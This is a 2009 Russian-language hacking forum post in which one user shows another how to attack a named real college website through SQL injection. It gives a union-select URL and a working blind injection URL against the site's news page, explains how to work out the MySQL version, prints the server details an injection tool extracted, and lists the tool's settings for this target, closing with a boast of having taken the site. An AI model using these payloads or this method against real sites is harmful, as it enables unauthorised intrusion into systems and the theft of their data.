11.12.2009, 17:34
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от hackmen
Спасибо.
!!!А где про эти методы можно подробнее почитать?
Грабли =)
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27+union+select+1,2,3,4,5,6, 7,8,9,10,11--%20+
Что не так? )
Как правильно сказал Spyder - там Blind:
Код:
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+or+1=1+and+substring(version(),1,1)=5--+
Чтобы понять, почему именно пятая ветка, просто подставь 3, а затем 4 вместо 5 - ошибок не увидишь, увидишь разницу в тексте на странице. Которая уникальна только при 5
Тулза схавала на раз:
Код:
@@version_compile_os: Win64
database(): trccweb
@@tmpdir: C:\Windows\TEMP
version(): 5.1.35-community
user(): webuser@localhost
@@basedir: C:\Program Files\MySQL\MySQL Server 5.1\
@@datadir: C:\ProgramData\MySQL\MySQL Server 5.1\Data\
про toolza 1.0 думаю тебе рассказывать не нужно, метод GET, режим NORMAL, настройки:
Код:
$method = 0;
$bl_url = "http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+or+1=1";
$bl_filtr = "--+";
$bl_plus = "+";
$bl_error = "HEARTSAVER FIRST";
$bl_error_type = 1;
Нажал на кнопку и зохавал сайт
Последний раз редактировалось Pashkela; 11.12.2009 в 17:38..
|
|
|